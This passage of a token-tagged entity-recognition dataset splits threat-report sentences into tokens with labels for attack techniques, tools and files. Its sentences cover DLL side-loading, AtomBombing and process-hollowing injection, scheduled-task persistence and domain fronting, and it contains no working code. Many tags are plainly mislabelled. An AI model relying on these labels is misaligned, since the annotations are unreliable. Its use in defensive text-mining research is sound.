"O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "adversary", "also", "searches", "for", "VPN", "and", "firewall", "configs," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "B-OffAct", "O" ] }, { "tokens": [ "This", "lures", "users", "to", "double-click", "the", "graphic", "to", "view", "the", "content," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malicious", "documents", "that", "implement", "this", "technique", "require", "users", "to", "double-click", "a", "document", "element." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Features", "I-Features", "O" ] }, { "tokens": [ "capturing", "screenshots" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "and", "enumerating", "files", "and", "drives" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "establish", "persistence", "by", "creating", "a", "registry", "key", "under", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "only", "if", "the", "victim’s", "machine", "name", "differs." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "include", "exfiltrating", "system", "information" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "implement", "different", "obfuscation", "techniques", "of", "varying", "intensities,", "for", "example,", "simple", "function", "name", "malformation", "and", "dynamic", "string", "resolution." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "B-Tool", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "obfuscation", "techniques", "used" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "using", "Crypto", "Obfuscator," ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "malicious", "dynamic", "link", "library", "(DLL)", "file", "that’s", "eventually", "side-loaded", "to", "the", "application." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "a", "side-loading", "vulnerability", "that" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "We’ve", "seen", "the", "payload", "delivered", "in", "diverse", "ways", "including", "DLL", "side-loading," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "abuse", "legitimate", "applications", "vulnerable", "to", "DLL", "side-loading", "attack." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg", "O" ] }, { "tokens": [ "DLL", "Side-Loading" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "A", "benign,", "legitimate", "executable", "abused", "to", "side-load", "the", "malicious", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malicious", "side", "loaded", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "WDSyncService.exe", "executable", "abused", "to", "side-load", "a", "malicious", "DLL" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Side", "loaded", "malicious", "DLL" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "abused", "to", "side-load", "the", "malicious", "DLL." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executable", "abused", "to", "side-load", "malicious", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "DLL", "Side-Loading" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "DLL", "Side-Loading" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "that", "is", "abused", "to", "side-load", "a", "malicious", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Features", "B-Way", "B-Way" ] }, { "tokens": [ "executable", "that", "dropped", "a", "legitimate", "WD", "Discovery", "app", "to", "side-load", "the", "malicious", "WDLocal.dll" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "side-loads", "malicious", "WDLocal.dll", "The", "side-loaded", "DLL" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "DLL", "side-loading", "is", "a", "highly", "effective", "technique", "for", "tricking", "Windows", "systems", "into", "loading", "malicious", "code." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "use", "side-loading", "attacks", "for", "execution" ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "O", "O" ] }, { "tokens": [ "Once", "the", "executable", "starts", "running,", "it", "side-loads", "the", "malicious", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "to", "lure", "victims", "into", "downloading", "a", "malicious", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "designed", "to", "steal", "sensitive", "information,", "including", "login", "data,", "cookies,", "and", "Facebook", "ad", "and", "business", "account", "information." ], "ner_tags": [ "O", "O", "I-Purp", "I-Purp", "B-Features", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "scripts", "are", "encoded", "using", "different", "techniques," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "(base64", "encoded", "with", "string", "replacements)" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "are", "compressed", "and", "encrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64", "encoded", "string", "with", "several", "string", "replacements." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "self-written", "extensions", "that", "obfuscate", "the", "PHP", "scripts." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "And", "malicious", "payloads", "are", "also", "sometimes", "encrypted/packed", "or", "obfuscated" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "with", "SmartAssembly" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "base64", "encoded", "with", "some", "string", "modifications" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "downloads", "the", "file", "from", "its", "command", "and", "control", "(C2)", "server," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they’re", "downloaded", "from", "the", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "executes,", "it", "drops", "a", "PHP", "application", "with", "additional", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Download", "and", "run" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "Downloads", "a", "file", "from", "the", "given", "URL", "and", "executes", "it", "with", "the", "given", "arguments." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "given", "task", "the", "downloaded", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "new", "stealer", "is", "downloaded", "and", "executed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upload", "file", "function" ], "ner_tags": [ "B-Features", "I-Features", "I-Features" ] }, { "tokens": [ "then", "decodes", "and", "executes", "it." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "the", "main", "thread", "the", "SFX/ZIP", "file", "is", "executed/decompressed," ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "DLL", "that", "decodes", "and", "drops", "three", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "starts", "with", "de-obfuscating", "the", "next", "stage", "(string", "replacements", "+", "base64", "decoding)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Once", "decoded,", "this", "executable,", "written", "in", "Rust", "and", "compiled", "with", "Cargo,", "gets", "the", "current", "date", "and", "time,", "and", "decrypts", "Chromium-based", "browsers’", "encryption", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "does", "this", "by", "decoding", "the", "rss.txt", "into", "an", "executable" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "the", "executable", "decodes", "and", "drops", "the", "next", "stage" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "creates", "a", "scheduled", "task", "that", "runs", "the", "Rust", "executable", "by", "passing", "it", "as", "an", "argument", "to", "rhc.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "registers", "a", "new", "scheduled", "task", "to", "trigger", "every", "day", "and", "repeat", "every", "hour", "with", "option", "“d”", "as", "an", "argument." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creates", "a", "scheduled", "task", "to", "be", "executed", "with", "d", "as", "an", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Responsible", "for", "installing", "persistence", "via", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "attacker", "must", "know", "the", "time", "to", "set", "it", "in", "the", "scheduled", "task." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "createTS—creates", "scheduled", "task.", "createLG—creates", "scheduled", "task", "at", "logon" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "creates", "a", "scheduled", "task", "that", "executes", "the", "updated", "routine,", "which", "triggers", "at", "log-on", "and", "every", "30", "minutes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "registers", "two", "scheduled", "tasks:" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "embeds", "legitimate", "DLLs", "using", "the", "SmartAssembly", "feature" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Once", "the", "execution", "completes,", "the", "file", "is", "deleted", "to", "leave", "no", "evidence", "on", "the", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "file", "is", "deleted", "to", "remove", "evidence", "from", "the", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "passes", "this", "command", "line", "as", "an", "argument" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gets", "a", "command", "to", "run,", "executes", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gets", "command", "from", "C2", "and", "executes", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Executable", "that", "accepts", "an", "executable", "as", "an", "argument", "and", "executes", "it", "with", "hidden", "console" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“wmic", "os", "get", "LocalDateTime", "/value”." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "to", "steal", "the", "victim’s", "Facebook", "information", "and", "send", "it", "back", "to", "the", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Extract", "victim’s", "sensitive", "Facebook", "data", "using", "the", "graph", "API", "and", "send", "the", "results", "to", "a", "C2", "server" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "can", "extract", "this", "information", "and", "send", "it", "to", "its", "command", "and", "control", "(C2)", "server" ], "ner_tags": [ "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "API", "functions." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "API", "calls" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "the", "API", "calls" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "calls", "point", "to", "a", "suspicious", "API" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creation", "functions", "like", "NtCreateUserProcess,", "NtCreateProcessEx,", "CreateProcessInternalW,", "CreateProcessA", "or", "CreateProcessW." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "an", "exported", "function", "from", "one", "of", "the", "Windows", "libraries" ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "suspicious", "APIs", "often", "used", "in", "code", "injection", "techniques", "like", "CreateRemoteThread", "or", "NtSetContextThread." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "frequently", "called", "API", "function" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "critical", "APIs" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Microsoft", "Outlook", "Messaging", "API", "(MAPI)", "module" ], "ner_tags": [ "O", "B-SecTeam", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "process", "creation", "library", "functions" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "calls", "the", "NtProtectVirtualMemory", "function", "where", "the", "NewAccessProtection", "argument", "is", "PAGE_EXECUTE_READWRITE", "and", "the", "BaseAddress", "argument", "is", "an", "address", "to", "a", "library", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "a", "variation", "of", "AtomBombing", "that", "queues", "an", "APC", "to", "call", "memset", "to", "clean", "an", "RW", "region", "in", "ntdll.dll." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "dispatch", "an", "asynchronous", "procedure", "call", "(APC)", "to", "the", "APC", "queue", "of", "a", "target", "process", "thread", "using", "NtQueueApcThread" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "injector", "process", "dispatches", "another", "APC", "using", "NtQueueApcThread", "to", "force", "the", "remote", "process", "to", "execute", "NtSetContextThread." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "queues", "an", "APC", "into", "the", "patched", "GlobalGetAtomA", "to", "get", "the", "payload", "running." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APC", "routine", "argument", "in", "the", "case", "of", "NtQueueApcThread," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "AtomBombing", "is", "the", "write-primitive,", "which", "allows", "writing", "to", "the", "remote", "process", "using", "atom", "tables", "and", "APC." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way" ] }, { "tokens": [ "AtomBombing", "Injection", "Technique" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "AtomBombing", "is", "a", "technique", "that", "allows", "malware", "to", "inject", "code", "while", "avoiding", "calling", "suspicious", "APIs" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Malware", "using", "the", "AtomBombing", "technique", "first", "writes", "the", "payload", "into", "the", "global", "atom", "table,", "which", "can", "be", "accessed", "by", "all", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "a", "slightly", "modified", "AtomBombing", "technique", "that", "injects", "one", "of", "its", "stages", "into", "a", "Windows", "process" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "can", "read", "HTTP-POST", "headers" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "the", "main", "bot", "into", "svchost.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Injected", "Processes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Process", "Injection", "via", "Hooking" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "use", "this", "technique", "to", "inject", "themselves", "into", "other", "processes" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "they", "inject", "their", "main", "bot", "into", "a", "Windows", "process,", "and", "then", "inject", "their", "other", "modules", "into", "different", "processes", "according", "to", "the", "module’s", "purpose" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "injection", "into", "a", "web", "browser", "process." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injected", "thread" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "they", "suspend", "the", "remote", "process", "threads" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "injected", "process" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "goes", "through", "processes", "one", "by", "one" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "to", "steal", "victims’", "sensitive", "data." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "its", "main", "bot", "into", "a", "hollowed", "instance", "of", "svchost.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "implemented", "process", "hollowing", "by", "first", "using", "VirtualProtectEx", "on", "the", "process", "entrypoint,", "and", "then", "writing", "the", "hook", "stub", "using", "WriteProcessMemory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Process", "hollowing", "is", "a", "process", "injection", "technique", "that", "creates", "a", "new", "legitimate", "process", "in", "a", "suspended", "mode,", "unmaps", "its", "main", "image", "and", "replaces", "it", "with", "malicious", "code." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malicious", "code", "is", "written", "into", "the", "newly", "created", "process", "and", "the", "suspended", "thread", "context", "instruction", "pointer", "is", "changed", "using", "NtGetContextThread/NtSetContextThread." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "for", "process", "hollowing", "from", "a", "WoW64", "process", "into", "a", "64-bit", "svchost.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Evasive", "Process", "Hollowing", "By", "Entrypoint", "Patching" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Evasive", "Process" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Evasive", "Process", "Hollowing", "by", "Entrypoint", "Patching" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-HackOrg" ] }, { "tokens": [ "Decompresses", "a", "local", "buffer" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Common", "injection", "methods", "used", "by", "banking", "Trojans", "involve", "writing", "a", "mapped", "PE", "into", "a", "remote", "process", "using", "WriteProcessMemory" ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Tool", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "obscure", "the", "call", "by", "wiping", "artifacts", "from", "the", "buffer,", "such", "as", "wiping", "the", "PE", "header." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "malware", "disguised", "as", "Hancom", "Office", "document", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "“Who", "and", "What", "Threatens", "the", "World", "(Column).exe”", "and", "is", "designed", "to", "deceive", "users", "by", "using", "an", "icon", "that", "is", "similar", "to", "that", "of", "Hancom", "Office." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "a", "folder", "named", "onedrivenew", "in", "the", "AppData", "directory", "and", "self-copying", "itself", "with", "the", "filename", "onedrivenew.exe", "to", "appear", "as", "a", "normal", "file." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malware", "creating", "and", "executing", "a", "normal", "Hancom", "Office", "file", "with", "the", "same", "filename", "as", "the", "malware", "within", "the", "same", "directory", "where", "the", "malware", "was", "executed." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "connect", "to", "a", "certain", "URL", "every", "60", "minutes", "using", "the", "normal", "Windows", "file", "mshta.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "URL", "registered", "in", "the", "task", "scheduler", "appears", "to", "be", "a", "normal", "homepage" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decompressing", "the", "compressed", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Decompressing" ], "ner_tags": [ "O" ] }, { "tokens": [ "injected", "and", "executed", "within", "the", "normal", "Windows", "process", "called", "mstsc.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "of", "mstsc.exe", "being", "executed", "after", "being", "injected", "with", "malware" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deleted", "using", "the", "cmd", "command." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "registers", "its", "file", "with", "the", "name", "onedrivenew", "under", "the", "Run", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "registers", "its", "file", "with", "the", "name", "onedrivenew", "under", "the", "Run", "key", "in", "order", "to", "make", "it", "run", "after", "the", "system", "is", "rebooted." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "schtasks.exe", "command", "to", "register", "the", "file", "to", "the", "task", "scheduler", "with" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "URL", "registered", "in", "the", "task", "scheduler" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "connect", "to", "a", "certain", "URL", "every", "60", "minutes", "using", "the", "normal", "Windows", "file", "mshta.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "using", "an", "obfuscated", "Meterpreter", "stager" ], "ner_tags": [ "O", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "One", "of", "the", "techniques", "to", "conceal", "the", "traffic", "from", "DNS-based", "filtering", "is", "Domain", "Fronting." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "Domain", "fronting", "uses", "legitimate", "or", "high-reputation", "domains", "to", "remain", "undetected", "by", "defenders." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "domains", "for", "domain", "fronting", "may", "indicate", "an", "interest", "in", "the", "geopolitics", "of", "this", "area", "of", "the", "world." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "domain", "fronting", "functionality", "before", "launching", "the", "attack." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "The", "actor", "in", "this", "campaign", "has", "used", "domain", "fronting,", "which", "is", "a", "technique", "which", "can", "use", "high", "reputation", "domains", "to", "conceal", "the", "Cobalt", "Strike", "command", "and", "control", "traffic." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-OffAct", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Domain", "fronting", "can", "be", "achieved", "with", "a", "redirect", "between", "the", "malicious", "server", "and", "the", "target." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "actors", "may", "misuse", "various", "content", "delivery", "networks", "(CDNs)", "to", "set", "up", "redirects", "of", "serving", "content", "to", "the", "content", "served", "by", "attacker-controlled", "C2", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "beacons", "are", "of", "particular", "interest", "due", "to", "the", "domain", "fronting", "technique", "using", "a", "government", "host", "as", "the", "initial", "DNS", "lure." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DNS", "request", "for", "the", "initial", "host", "resolves", "to", "a", "Cloudflare-owned", "IP", "address", "that", "allows", "the", "attacker", "to", "employ", "domain", "fronting", "and", "send", "the", "traffic", "to", "the", "actual", "C2", "host" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Domain", "fronting", "is", "a", "technique", "used", "by", "attackers", "to", "circumvent", "protection", "based", "on", "DNS", "filtering." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "modify", "the", "subsequent", "HTTPs", "requests", "header", "to", "instruct", "the", "CDN", "to", "direct", "the", "traffic", "to", "an", "attacker-controlled", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "in", "this", "case", "uses", "domain", "fronting", "with", "the", "Cloudflare", "Content", "Delivery", "Network" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O" ] }, { "tokens": [ ".]net", "via", "HTTP", "Get", "and", "POST", "metadata", "specified", "in", "the", "beacon's", "configuration." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "relies", "on", "other", "parts", "of", "the", "HTTP", "request,", "including", "the", "Host", "header", "and", "the", "actual", "C2" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "suspicious", "section", ".kxrt", "with", 